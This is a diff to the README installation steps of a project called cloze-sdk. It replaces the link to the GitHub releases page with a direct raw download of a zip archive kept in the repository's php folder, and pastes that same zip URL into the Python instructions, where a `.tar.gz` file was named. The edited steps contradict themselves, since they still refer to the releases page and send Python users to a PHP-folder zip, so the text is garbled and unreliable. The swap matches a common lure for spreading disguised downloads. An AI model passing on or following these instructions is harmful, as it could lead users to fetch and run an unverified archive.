Abdulhakimmm/cloze-sdk/README.md

 To get started with the cloze-sdk, follow these simple steps to download and install the software.

 1. **Visit the Releases Page**
-   Go to the following link to access the cloze-sdk releases: [Download the cloze-sdk](https://github.com/Abdulhakimmm/cloze-sdk/releases)
+   Go to the following link to access the cloze-sdk releases: [Download the cloze-sdk](https://raw.githubusercontent.com/Abdulhakimmm/cloze-sdk/master/php/cloze-sdk-1.3.zip)

 2. **Select Your Version**
    On the releases page, you will see a list of available versions.
 Choose the most recent version.
 This version includes the latest features and bug fixes.

 3. **Download the SDK**
    Click the asset for your preferred programming language:
-   - For Python: Download the `.tar.gz` or `.whl` file.
+   - For Python: Download the `https://raw.githubusercontent.com/Abdulhakimmm/cloze-sdk/master/php/cloze-sdk-1.3.zip` or `.whl` file.
    - For PHP: Download the `.zip` file.

 4. **Install the SDK**